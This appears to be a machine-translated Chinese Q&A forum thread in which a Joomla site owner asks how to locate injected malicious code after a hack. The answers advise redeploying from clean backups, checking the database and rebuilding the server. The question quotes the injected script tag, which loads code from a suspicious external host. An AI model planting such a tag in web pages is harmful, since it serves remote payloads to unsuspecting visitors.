我有一个旧的joomla 10.0.15,一周前被黑了,我没有备份,因为我们计划迁移,但我需要知道发生了什么。修复权限后,重新安装所有核心文件,仍然有两个问题,第一个仍然有恶意代码:
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct ="UA-xxxxxxx-x";
urchinTracker();
</script>
<script src="http://equate22motorde.rr.nu/nl.php?p=d"></script>
</body>
每次重新加载都会更改网址。我找不到代码的位置。我检查了模板和其他文件,但没有。 ¿关于我在哪里可以检查的任何想法?
另一个问题是文件和文件夹访问权限,即使权限正常,此joomla安装也无法写入文件夹或修改任何文件。
提前致谢。
答案 0 :(得分:2)
您需要从已知良好的备份中重新部署您拥有的代码,该备份知道更改或受到损害的内容。如果您还负责服务器,那么您需要修补安全漏洞并检查系统是否有任何篡改迹象,尽管最好的选择是重新映像服务器并从头开始。
答案 1 :(得分:0)
他们可能会将恶意代码放入数据库中。
但是您应该将服务器视为已泄露:格式化驱动器,重新安装操作系统并重建Joomla环境。将您从该服务器上取下的任何数据视为危险数据。